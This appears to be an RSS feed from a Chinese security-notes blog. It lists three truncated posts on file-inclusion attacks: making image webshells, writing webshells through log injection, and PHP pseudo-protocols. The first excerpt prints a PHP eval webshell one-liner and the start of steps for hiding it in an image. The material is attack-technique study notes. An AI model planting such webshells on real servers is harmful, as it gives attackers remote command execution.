<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>文件包含 on SecNote</title><link>http://antjump.com/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/</link><description>Recent content in 文件包含 on SecNote</description><generator>Hugo -- 0.123.7</generator><language>zh-CN</language><lastBuildDate>Wed, 22 Apr 2026 16:57:02 +0000</lastBuildDate><atom:link href="http://antjump.com/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/index.xml" rel="self" type="application/rss+xml"/><item><title>图片马制作</title><link>http://antjump.com/posts/%E5%9B%BE%E7%89%87%E9%A9%AC%E5%88%B6%E4%BD%9C/</link><pubDate>Wed, 22 Apr 2026 16:57:02 +0000</pubDate><guid>http://antjump.com/posts/%E5%9B%BE%E7%89%87%E9%A9%AC%E5%88%B6%E4%BD%9C/</guid><description>Linux 下制作图片马 方法1：cat 命令直接拼接（最简单，通用） # 准备一个包含PHP代码的文本文件 shell.php echo &amp;#39;&amp;lt;?php @eval($_POST[&amp;#34;cmd&amp;#34;]);?&amp;gt;&amp;#39; &amp;gt; shell.php # 准备一张正常图片 image.jpg # 拼接：图片在前，</description></item><item><title>WebShell写入方法</title><link>http://antjump.com/posts/webshell%E5%86%99%E5%85%A5%E6%96%B9%E6%B3%95/</link><pubDate>Wed, 22 Apr 2026 15:04:39 +0000</pubDate><guid>http://antjump.com/posts/webshell%E5%86%99%E5%85%A5%E6%96%B9%E6%B3%95/</guid><description>利用日志注入写入 原理：向日志文件写入PHP代码后，包含该日志文件触发代码执行，代码中再写入Webshell到可访问目录。 Web服务器日志注入</description></item><item><title>PHP伪协议</title><link>http://antjump.com/posts/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/</link><pubDate>Tue, 21 Apr 2026 15:29:15 +0000</pubDate><guid>http://antjump.com/posts/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/</guid><description>一、文件包含漏洞可用 PHP 伪协议 汇总表 伪协议 语法格式 核心功能（文件包含场景） 依赖 / 条件 file:// file://绝对路径 file://相对路径 读取本地文件</description></item></channel></rss>